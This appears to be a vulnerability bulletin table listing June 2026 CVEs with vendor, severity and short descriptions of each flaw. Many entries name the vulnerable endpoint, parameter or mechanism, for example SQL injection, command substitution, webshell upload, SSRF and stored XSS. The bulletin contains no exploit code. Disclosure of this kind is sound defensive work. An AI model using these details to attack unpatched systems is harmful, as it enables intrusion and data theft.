| SourceCodester--Computer Repair Shop Management System | A vulnerability was found in SourceCodester Computer Repair Shop Management System up to 1.0. Affected is an unknown function of the file /admin/products/manage_product.php. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. | 2026-06-01 | 7.3 | CVE-2026-10263 |
| SourceCodester--Online Food Ordering System | A vulnerability was detected in SourceCodester Online Food Ordering System 2.0. Affected by this issue is the function include of the file /index.php. The manipulation of the argument page results in file inclusion. The attack can be launched remotely. The exploit is now public and may be used. | 2026-06-03 | 7.3 | CVE-2026-10694 |
| SourceCodester--Pizzafy E-Commerce System | A vulnerability was detected in SourceCodester Pizzafy E-Commerce System 1.0. Affected by this vulnerability is the function Login of the file /admin/admin_class_novo.php of the component Administrative Control Panel. The manipulation of the argument Username results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. | 2026-06-03 | 7.3 | CVE-2026-10704 |
| SourceCodester--SEO Meta Tag Extractor | A vulnerability was determined in SourceCodester SEO Meta Tag Extractor 1.0. This vulnerability affects the function get_headers of the file /index.php. This manipulation of the argument url causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-01 | 7.3 | CVE-2026-10287 |
| SourceCodester--Ship Ferry Ticket Reservation System | A security vulnerability has been detected in SourceCodester Ship Ferry Ticket Reservation System up to 1.0. This impacts an unknown function of the file /admin/login.php of the component Admin Login. Such manipulation of the argument Username leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2026-06-04 | 7.3 | CVE-2026-10877 |
| SourceCodester--Water Billing Management System | A vulnerability has been found in SourceCodester Water Billing Management System 1.0. This issue affects some unknown processing of the file /classes/Users.php?f=save of the component User Management Endpoint. Such manipulation leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 7.3 | CVE-2026-10236 |
| Spacelabs Healthcare--Sentinel | Spacelabs Healthcare Sentinel versions 10.5.x and higher and 11.x.x before 11.6.0 contain an unauthenticated remote code execution vulnerability through a deprecated .NET Remoting HTTP channel exposed on port 8989 that allows attackers to perform arbitrary file read and write operations by supplying valid .NET URI endpoints. Attackers can write ASPX webshells to the IIS wwwroot directory to achieve unauthenticated remote code execution on the system. Port 8989 is not exposed in a default Sentinel installation; exploitation requires that the .NET Remoting port has been explicitly made network-accessible through deliberate configuration or network policy changes. | 2026-06-02 | 9.8 | CVE-2026-0611 |
| SQLite--sqldiff | SQLite 'sqldiff.exe' does not securely handle the way the Microsoft Windows C runtime converts Unicode characters to ANSI codepages. An attacker could use the '-L' option to load an arbitrary DLL with a crafted command line argument string that results in command line file arguments being misinterpreted as command line options. Fixed on or around 2025-12-26. | 2026-06-04 | 9.8 | CVE-2025-71316 |
| steipete--CodexBar | CodexBar prior to 0.32.0 contains a privilege escalation vulnerability in the CLI installer that allows local attackers to execute arbitrary commands as root by exploiting a race condition in temporary file handling. The installer creates a temporary file with mktemp, writes a privileged shell payload into it, and executes it with administrator privileges via bash, allowing a same-user local process to rewrite the installer body before the administrator prompt is approved, causing attacker-controlled commands to run as root. | 2026-06-01 | 7.1 | CVE-2026-49134 |
| steipete--CodexBar | CodexBar prior to 0.32.0 contains an insecure temporary file handling vulnerability that allows local attackers to access sensitive credentials or tamper with build artifacts by exploiting predictable file paths in the release notarization workflow. Attackers with access to the same host can read the App Store Connect API key written to a fixed path, pre-create files or symbolic links at predictable locations to redirect writes to attacker-controlled destinations, or tamper with notarization archives before submission. | 2026-06-01 | 7.1 | CVE-2026-49135 |
| SWivid--F5-TTS | F5-TTS through version 1.1.20 contains a path traversal vulnerability in the finetune Gradio handlers that allows unauthenticated attackers to write arbitrary files by passing unsanitized user-supplied project names directly to os.path.join() without validating the resulting path stays within the intended base directory. Attackers can supply absolute path arguments such as /tmp/EVIL to override the base directory entirely and create arbitrary directories with attacker-controlled JSON content at any filesystem path writable by the server process. | 2026-06-01 | 8.2 | CVE-2026-43624 |
| Synology--Synology Active Backup for Business Recovery Media Creator | An inclusion of functionality from untrusted control sphere vulnerability in OpenSSL configuration in Synology Active Backup for Business Recovery Media Creator before 2.5.0-2081 allows local users to execute arbitrary code via unspecified vectors. | 2026-06-03 | 7.8 | CVE-2022-49036 |
| Synology--Synology Hyper Backup Explorer | An inclusion of functionality from untrusted control sphere vulnerability in MinGW DLL component in Synology Hyper Backup Explorer before 3.0.1-0156 allows local users to execute arbitrary code via unspecified vectors. | 2026-06-03 | 7.8 | CVE-2022-49042 |
| Tautulli--Tautulli | Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Versions prior to 2.17.1 expose a public `/image/<hash>` route that resolves attacker-controlled entries from `image_hash_lookup` and replays them through the same server-side image fetch logic used by authenticated image proxying. A low-privilege guest user can seed a malicious external image URL into this lookup table and then trigger server-side fetches through a fully unauthenticated endpoint. This turns an authenticated SSRF primitive into a persistent unauthenticated SSRF gadget. Once the malicious hash entry exists, any external user can request `/image/<hash>.png` and cause the PMS or Tautulli host to fetch an arbitrary attacker-chosen URL. Version 2.17.1 patches the issue. | 2026-06-04 | 9.9 | CVE-2026-43986 |
| Tautulli--Tautulli | Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Versions prior to 2.17.1 expose `log_js_errors` to any authenticated user, including guest users when guest access is enabled. The endpoint writes attacker-controlled strings directly into the main application log. The administrator-only `logFile` view then reads that log file and embeds it into an HTML response without escaping. This creates a stored cross-site scripting condition where a low-privilege guest can inject HTML or JavaScript into the log file and have it execute in an administrator's browser when the log viewer is opened. Version 2.17.1 patches the issue. | 2026-06-04 | 8.9 | CVE-2026-43984 |
| Tautulli--Tautulli | Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Versions prior to 2.17.1 expose `configUpdate` as a state-changing administrator endpoint, but the route does not enforce `POST` and does not use any anti-CSRF token. In the default form and JWT-based authentication mode, the administrator session cookie is issued with `SameSite=Lax`, which still permits top-level cross-site navigation requests. An attacker can exploit this by luring a logged-in administrator to a malicious page that submits a cross-site request to `/configUpdate` and overwrites the local administrator username and password. The attacker can then sign in directly with the chosen credentials and take over the Tautulli administrative interface. Version 2.17.1 patches the issue. | 2026-06-04 | 8.8 | CVE-2026-43985 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the GET /ssh/file_manager/ssh/resolvePath endpoint in Termix is vulnerable to OS command injection. The endpoint uses double-quote escaping for shell command construction, which does not prevent $(...) and backtick command substitution. Any authenticated user with an active File Manager SSH session can execute arbitrary commands on the connected remote host. Version 2.3.2 patches the issue. | 2026-06-05 | 9.9 | CVE-2026-45744 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the File Manager functionality in Termix contains a critical Broken Access Control vulnerability due to improper validation of the sessionId parameter. The backend trusts a client-controlled identifier without verifying that it belongs to the authenticated user. This allows an attacker to manipulate the value and access active File Manager sessions belonging to other users. Since these sessions are tied to SSH connections to remote VPS instances, exploitation allows unauthorized interaction with another user's remote filesystem. Because the File Manager exposes functionality such as file reading, writing, uploading, and execution, this vulnerability enables direct command execution on another user's VPS (RCE). Version 2.3.2 patches the issue. | 2026-06-05 | 9 | CVE-2026-45746 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. The `POST /ssh/tunnel/connect` endpoint in Termix prior to version 2.3.2 builds an SSH tunnel command by interpolating user-controlled host record fields (`endpointIP`, `endpointUsername`, `password`) directly into a shell command without escaping, allowing persistent OS command injection on the source SSH host. Version 2.3.2 patches the issue. | 2026-06-05 | 9.8 | CVE-2026-45748 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the GET /ssh/file_manager/ssh/resolvePath endpoint in the Termix File Manager component unsafely processes the path parameter and embeds it into a shell command executed over the active SSH session. Because the user-controlled value is placed inside double quotes and only double quotes are escaped, shell command substitution syntax such as $(...) is still interpreted by the remote shell. Version 2.3.2 fixes the issue. | 2026-06-05 | 9 | CVE-2026-45750 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. 16 file-manager endpoints in Termix prior to version 2.3.2 do not verify that the requesting user owns the SSH session identified by `sessionId`. An authenticated attacker who knows or guesses another user's active `sessionId` can read, write, delete, download, and execute files on the victim's connected SSH host. Version 2.3.2 patches the issue. | 2026-06-05 | 8.1 | CVE-2026-45743 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Starting in version 1.7.0, Termix Desktop (Electron) disables TLS certificate validation, allowing a machine-in-the-middle attacker to intercept and modify HTTPS traffic to the configured Termix server. This can lead to credential theft and JWT/session theft during login and normal use. As of time of publication, no known patched versions are available. | 2026-06-05 | 8 | CVE-2026-45745 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. The `POST /users/totp/disable` and `POST /users/totp/backup-codes` endpoints in Termix prior to version 2.3.2 accept the account password as a sole authentication factor for MFA-critical operations. An attacker who obtains a user's password (phishing, credential stuffing, the passwordHash leak in GHSA-xxxx) can disable TOTP entirely or regenerate backup codes, without ever possessing the TOTP device or knowing a valid TOTP code. This renders two-factor authentication ineffective. Version 2.3.2 patches the issue. | 2026-06-05 | 8.1 | CVE-2026-45749 |
| Themefic--Hydra Booking | Missing Authorization vulnerability in Themefic Hydra Booking allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hydra Booking: from n/a through 1.1.41. | 2026-06-01 | 7.3 | CVE-2026-42675 |
| Themeisle--Masteriyo LMS PRO | Incorrect Privilege Assignment vulnerability in Themeisle Masteriyo LMS PRO allows Privilege Escalation. This issue affects Masteriyo LMS PRO: from n/a through 2.20.0. | 2026-06-02 | 9.8 | CVE-2025-53209 |
| Themerig--Listing Hub CMS | Listing Hub CMS 1.0 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send GET requests to pages.php with crafted id values using error-based SQL injection techniques to extract database credentials, usernames, and version information. | 2026-06-04 | 8.2 | CVE-2019-25730 |
| themeum--Kirki Freeform Page Builder, Website Builder & Customizer | The Kirki - Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions 6.0.0 to 6.0.6. This is due to the plugin accepting an arbitrary email address when a username is used in the password reset request. This makes it possible for unauthenticated attackers to send a password reset link for any user registered on the site to their own email address. | 2026-06-02 | 9.8 | CVE-2026-8206 |
| ThimPress--LearnPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress allows Reflected XSS. This issue affects LearnPress: from n/a through 4.3.6. | 2026-06-01 | 7.1 | CVE-2026-48865 |
| ThimPress--Thim Core | Missing Authorization vulnerability leading to code execution after installing malicious vulnerable plugin in ThimPress Thim Core. This issue affects Thim Core: from n/a through 2.3.3. | 2026-06-02 | 8.8 | CVE-2025-53345 |
| tittuvarghese--CollegeManagementSystem | A vulnerability was detected in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. This affects an unknown function of the file dashboard_page/forms/fetch.php. Performing a manipulation of the argument department_code results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 7.3 | CVE-2026-11334 |
| Tomdever--wpForo Forum | Missing Authorization vulnerability in Tomdever wpForo Forum allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects wpForo Forum: from n/a through 3.0.6. | 2026-06-01 | 9.1 | CVE-2026-42682 |
| UnboundStudio--Accordion FAQ | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in UnboundStudio Accordion FAQ allows Reflected XSS. This issue affects Accordion FAQ: from n/a through 2.2.1. | 2026-06-02 | 7.1 | CVE-2025-52759 |
| UnboundStudio--Accordion FAQ | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in UnboundStudio Accordion FAQ allows PHP Local File Inclusion. This issue affects Accordion FAQ: from n/a through 2.2.1. | 2026-06-02 | 7.5 | CVE-2025-58024 |
| USCiLab--Cereal | A vulnerability was determined in USCiLab Cereal up to 1.3.2. Affected is an unknown function of the component Shared Pointer Handler. Executing a manipulation can lead to type confusion. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure. | 2026-06-07 | 7.3 | CVE-2026-11463 |
| UTT--HiPER 1200GW | A vulnerability was detected in UTT HiPER 1200GW up to 2.5.3-170306. This affects the function strcpy of the file /goform/formTaskEdit. The manipulation results in stack-based buffer overflow. The attack may be launched remotely. The exploit is now public and may be used. | 2026-06-01 | 8.8 | CVE-2026-10292 |
| UTT--HiPER 1200GW | A flaw has been found in UTT HiPER 1200GW up to 2.5.3-170306. This impacts the function strcpy of the file /goform/formFireWall. This manipulation of the argument Profile causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-06-01 | 8.8 | CVE-2026-10293 |
| VeronaLabs--WP Statistics | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP Statistics allows DOM-Based XSS. This issue affects WP Statistics: from n/a through 14.16.6. | 2026-06-01 | 7.1 | CVE-2026-48839 |
| vertex-app--vertex | Vertex is a management tool for PT (Private Tracker) users to manage streaming and watching videos. Versions prior to commit fbde301b97986d5913fc4bc95f5445750d282e11 are vulnerable to path traversal. Users should upgrade to a version containing commit fbde301b97986d5913fc4bc95f5445750d282e11 to receive a patch. | 2026-06-01 | 8.6 | CVE-2024-40646 |
| Wasiliy Strecker / ContestGallery developer--Contest Gallery Pro | Incorrect Privilege Assignment vulnerability in Wasiliy Strecker / ContestGallery developer Contest Gallery Pro allows Privilege Escalation. This issue affects Contest Gallery Pro: from n/a through 29.0.1. | 2026-06-01 | 9.8 | CVE-2026-42680 |
| webfactory--Advanced Google reCAPTCHA | The WP Captcha PRO (the premium version of the Advanced Google reCAPTCHA plugin, both have the same slug) plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 5.38. This is due to a capability check in the save_ajax() function of the licensing module, combined with unrestricted file extraction in sync_cloud_protection(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files including PHP webshells to the server by injecting a malicious cloud_protection_url into the license meta, which the plugin then downloads and extracts without file type validation into a web-accessible uploads directory. This can be used for remote code execution. Note: The vulnerability can only be exploited with a remote URL if "allow_url_fopen" is enabled in the php.ini config. | 2026-06-05 | 8.8 | CVE-2026-5411 |
| webfactory--Advanced Google reCAPTCHA | The WP Captcha PRO (the premium version of the Advanced Google reCAPTCHA plugin, both have the same slug) plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 5.38. This is due to the ajax_run_tool() AJAX handler relying solely on a nonce check (check_ajax_referer) for security without performing any capability check, combined with the create_temporary_link tool allowing the generation of passwordless login links for arbitrary users, and the handle_temporary_links() function authenticating visitors via these links without any additional authorization validation. The required nonce is exposed to all authenticated backend users (including Subscribers) via wp_localize_script() on all non-settings admin pages when the plugin's welcome pointer has not been dismissed. This makes it possible for authenticated attackers, with Subscriber-level access and above, to bypass normal authentication and log in as any user, including Administrators, resulting in complete account takeover. | 2026-06-05 | 8.8 | CVE-2026-5415 |
| Wp Directory Kit--WP Directory Kit | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Wp Directory Kit WP Directory Kit allows Blind SQL Injection. This issue affects WP Directory Kit: from n/a through 1.5.1. | 2026-06-01 | 9.3 | CVE-2026-42672 |
| WP Swings--Wallet System for WooCommerce | Authentication Bypass Using an Alternate Path or Channel vulnerability in WP Swings Wallet System for WooCommerce allows Password Recovery Exploitation. This issue affects Wallet System for WooCommerce: from n/a through 2.7.5. | 2026-06-02 | 7.1 | CVE-2026-42654 |
| wpdevteam--Gutenberg Essential Blocks Page Builder for Gutenberg Blocks & Patterns | The Gutenberg Essential Blocks - Page Builder for Gutenberg Blocks & Patterns plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.1.3 via the `save_ai_generated_image()` function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-06-04 | 7.2 | CVE-2026-10586 |
| wpusermanager--WP User Manager User Profile Builder & Membership | The WP User Manager - User Profile Builder & Membership plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.17 via the (profile template scope) function. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. | 2026-06-05 | 7.5 | CVE-2026-9290 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. Prior to version 3.12.0, ui.restructured_text() renders reStructuredText server-side with Docutils without disabling file insertion directives. When a NiceGUI application passes attacker-controlled content to ui.restructured_text(), an attacker can use standard Docutils directives (include, csv-table with :file:, raw with :file:) to read local files readable by the NiceGUI server process. Applications that only pass trusted static strings to ui.restructured_text() are not affected. This issue has been patched in version 3.12.0. | 2026-06-02 | 7.5 | CVE-2026-45553 |
| zhayujie--chatgpt-on-wechat | A weakness has been identified in zhayujie chatgpt-on-wechat up to 2.0.8. This issue affects the function _get_safety_warning of the file agent/tools/bash/bash.py of the component Bash Tool. Executing a manipulation can lead to os command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 2.0.9 is capable of addressing this issue. This patch is called 16d9b449c9aa53ccee44144a762a2737d7ba4fc4. It is recommended to upgrade the affected component. | 2026-06-01 | 7.3 | CVE-2026-10214 |
| Zuz--Zuz Music | Zuz Music 2.1 contains a persistent cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious JavaScript by submitting crafted contact form data. Attackers can inject script code through the name, subject, and message parameters in POST requests to /gmusic/zuzconsole/___contact, which executes when administrators view messages in the inbox interface. | 2026-06-04 | 7.2 | CVE-2019-25731 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 10web--Photo Gallery by 10Web Mobile-Friendly Image Gallery | The Photo Gallery by 10Web - Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to time-based SQL Injection via 'compact_album_order_by' Shortcode Parameter in all versions up to, and including, 1.8.41 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The malicious payload is stored via the 'shortcode_bwg' AJAX handler - accessible to Contributor-level users and exploitable without a valid nonce by omitting the 'page' parameter - and is subsequently triggered by the unauthenticated 'bwg_frontend_data' AJAX handler, meaning successful exploitation requires only that an attacker has Contributor-level access to save the shortcode. | 2026-06-06 | 6.5 | CVE-2026-9829 |
| a4m4--Student-Management-System | A flaw has been found in a4m4 Student-Management-System up to f0c5f6842c5e8c431ff02b5260a565ca844df3a0. The affected element is an unknown function of the file admin/ of the component Admin Endpoint. This manipulation of the argument uid causes execution after redirect. It is possible to initiate the attack remotely. The exploit has been published and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.3 | CVE-2026-10271 |
| a4m4--Student-Management-System | A vulnerability has been found in a4m4 Student-Management-System up to f0c5f6842c5e8c431ff02b5260a565ca844df3a0. The impacted element is an unknown function of the file admin/deleteform.php. Such manipulation of the argument sid leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.5 | CVE-2026-10272 |
| absikandar--Frontend User Notes | The Frontend User Notes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on the funp_ajax_modify_notes function. This makes it possible for unauthenticated attackers to trick a logged-in user into visiting a malicious page, causing unauthorized overwriting of that victim's own note content via a forged cross-site request to wp_update_post() via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Due to ownership enforcement comparing the note's stored _funp_single_user_id meta against the current session's user ID, the attack is limited to modifying only notes belonging to the tricked victim, and cannot be used to alter notes owned by arbitrary third-party users. | 2026-06-05 | 4.3 | CVE-2026-7047 |
| ahujasid--blender-mcp | A vulnerability was found in ahujasid blender-mcp up to 7636d13bded82eca58eb93c3f4cd8708dfdfbe8b. The affected element is the function requests.get of the file src/blender_mcp/server.py of the component ZIP File Handler. The manipulation of the argument zip_file_url results in server-side request forgery. The attack can be executed remotely. The exploit has been made public and could be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The patch is identified as 5b37be25242e73dc4cf1328974d30458b9e5d67e. It is advisable to implement a patch to correct this issue. | 2026-06-02 | 6.3 | CVE-2026-10662 |
| ahujasid--blender-mcp | A vulnerability was determined in ahujasid blender-mcp up to 7636d13bded82eca58eb93c3f4cd8708dfdfbe8b. The impacted element is the function execute_blender_code of the file /src/blender_mcp/server.py. This manipulation of the argument code causes code injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-02 | 5.5 | CVE-2026-10688 |
| ahujasid--blender-mcp | A vulnerability has been found in ahujasid blender-mcp up to 7636d13bded82eca58eb93c3f4cd8708dfdfbe8b. Impacted is the function Open of the file src/blender_mcp/server.py. The manipulation of the argument input_image_url leads to injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The identifier of the patch is 5b37be25242e73dc4cf1328974d30458b9e5d67e. To fix this issue, it is recommended to deploy a patch. | 2026-06-02 | 4.3 | CVE-2026-10661 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.14.0, using ``CookieJar.load()`` with untrusted input may allow arbitrary code execution. Most applications using this function will be doing so with the user's own data, so this is unlikely to affect many applications. Version 3.14.0 patches the issue. If an application does allow attacker controlled files to be loaded, a workaround on older releases would be to sanitize the files before loading. | 2026-06-02 | 6.4 | CVE-2026-34993 |
| alejo30--Alba Board | The Alba Board plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.1.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to access arbitrary private alba_card post data, including title, description, assignee, due date, tags, and comments, that is intended to be restricted to Administrators and Editors. The handler is registered via the wp_ajax_nopriv_ hook and its nonce is exposed to all site visitors through wp_localize_script on pages containing the [alba_board] shortcode, making this exploitable by unauthenticated users who can access any such page. | 2026-06-05 | 4.3 | CVE-2026-7523 |
| alfio-event--alf.io | alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. Prior to version 2.0-M5-2606, the alf.io extension sandbox injects a fully-functional HTTP client (`simpleHttpClient`) into every extension script's scope. The `postFileAndSaveResponse()` method accepts an arbitrary filesystem path as its `file` parameter and reads the file contents using `new FileInputStream(file)` with no path validation, directory restriction, or allowlist. A malicious extension script can read any file accessible to the JVM process user and exfiltrate it to an attacker-controlled server via HTTP POST. Version 2.0-M5-2606 patches the issue. | 2026-06-02 | 4.9 | CVE-2026-41412 |
| Anton Shevchuk--Constructor | Missing Authorization vulnerability in Anton Shevchuk Constructor allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Constructor: from n/a through 1.6.5. | 2026-06-02 | 5.3 | CVE-2025-53302 |
| Appsmith--Appsmith | Appsmith's SQL query editor's autocomplete functionality fails to sanitize database object names before rendering them in innerHTML, allowing an authenticated Developer to inject persistent XSS by a malicious table or column names triggering arbitrary code execution in the sessions of other workspace members when they interact with the same datasource. | 2026-06-02 | 6.3 | CVE-2026-7299 |
| Arista Networks--Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) | An encrypted password command injection vulnerability exists in the Captive Portal application framework of Arista Edge Threat Management - Arista Next Generation Firewall (NGFW). This issue uniquely affects version 17.4.0; earlier software releases are not exposed. | 2026-06-05 | 6 | CVE-2026-25620 |
| Arista Networks--Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) | A Reports application infrastructure vulnerability exists in Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) due to insecure input validation. This issue uniquely affects version 17.4.0; earlier software releases are not exposed. | 2026-06-05 | 6 | CVE-2026-25621 |
| Arista Networks--Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) | A Captive Portal Custom Handler command injection vulnerability exists in Arista Edge Threat Management - Arista Next Generation Firewall (NGFW). On affected platforms, an administrative account logged into the user interface can exploit this input handling behavior to execute arbitrary platform shell commands. | 2026-06-05 | 6 | CVE-2026-25622 |
| Arista Networks--Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) | An input validation command execution vulnerability exists in the browser management pipeline of Arista Edge Threat Management - Arista Next Generation Firewall (NGFW). Authenticated administrators can leverage this exposure to obtain underlying terminal script code processing execution permissions. | 2026-06-05 | 6 | CVE-2026-25623 |
| Arista Networks--Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) | An administrative cross-site scripting (XSS) vulnerability exists in the web user interface dashboard layout of Arista Edge Threat Management - Arista Next Generation Firewall (NGFW). Unvalidated user-supplied variables are echoed back to administrative profiles, facilitating vector payload processing behavior controls. | 2026-06-05 | 5.7 | CVE-2026-25624 |
| Arista Networks--EOS | On affected platforms running Arista EOS with 802.1x authentication configured on the access/trunk ports, and routing enabled on the access VLAN of the ports, a malicious supplicant may be able to bypass the requirement to perform 802.1x authentication. | 2026-06-04 | 5.9 | CVE-2023-5502 |
| Arista Networks--EOS | On affected platforms running Arista EOS with MACsec and egress ACLs configured on the same interfaces, the ACL policies may not be enforced for packets egressing on those ports. This can cause outgoing packets to incorrectly be allowed or denied. | 2026-06-04 | 5.3 | CVE-2024-27891 |
| Arista Networks--EOS | On affected platforms with hardware IPSec support running Arista EOS with certain IPsec features enabled, EOS may exhibit unexpected behavior in specific cases. Physical interface flaps and certain agent restarts can cause IPsec tunnel re-establishment with existing Security Associations, resulting in sequence number mismatches between tunnel endpoints potentially causing unstable communication. | 2026-06-05 | 5.9 | CVE-2026-2379 |
| Arista Networks--EOS | On affected platforms running Arista EOS where a tunnel decapsulation configuration-such as VXLAN (Virtual Extensible LAN), decap-groups, or a GRE (Generic Routing Encapsulation) tunnel interface-is present, the switch will incorrectly decapsulate and forward other unexpected tunneled packet with a destination IP matching its configured decapsulation IP. This occurs because the switch does not verify the tunnel protocol type, potentially leading to the unexpected processing of non-configured tunnel traffic. This issue has been reported as being exploited in the wild. | 2026-06-05 | 5.8 | CVE-2026-7473 |
| Arista Networks--EOS / CloudVision eXchange (CVX) | In a CVX cluster, an EOS switch connected to a CVX server is not resilient to certain malformed messages received from the connected CVX server. Similarly, the CVX server is not resilient to certain malformed messages received from the connected EOS switch. This leads to either a Sysdb agent crash on the EOS device causing a soft reset of the switch or agent crashes on the CVX server causing instability of the CVX cluster. An attacker could use this behavior to create a denial of service (DoS) scenario. Note that this would require the attacker to already have a high privilege access to the connected device to be able to send custom TCP packets. EOS switches that are not connected to a CVX server are not impacted. | 2026-06-05 | 6.5 | CVE-2025-5089 |
| Arista Networks--EOS / CloudVision eXchange (CVX) | CVX is not resilient to unexpected messages from a connected switch. This leads to agent crashes on CVX causing instability in the CVX cluster. An attacker could use this behavior to create a denial of service (DoS) scenario. Note that this would require the attacker to have a high privilege access to the connected switch to be able to send custom TCP packets to the CVX. | 2026-06-05 | 6.5 | CVE-2025-5090 |
| ariyes--WP Nano AD | The WP Nano AD plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blogrole_link' parameter in all versions up to, and including, 1.31 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-06-02 | 5.5 | CVE-2025-5085 |
| armember--ARMember Premium Membership Plugin, Content Restriction, Member Levels, User Profile & User signup | The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'sSortDir_0' parameter of the `get_private_content_data` AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient sanitization of the user-supplied parameter which is concatenated directly into the ORDER BY clause of an SQL query without a whitelist check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Note: The vulnerability can only be exploited if the "User Private Content" addon is enabled, which is disabled by default.. | 2026-06-02 | 6.5 | CVE-2026-5074 |
| arunbasillal--Auto Image Attributes From Filename With Bulk Updater (Add Alt Text, Image Title For Image SEO) | The Auto Image Attributes From Filename With Bulk Updater (Add Alt Text, Image Title For Image SEO) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the attachment metadata in all versions up to, and including, 4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 6.4 | CVE-2026-3722 |
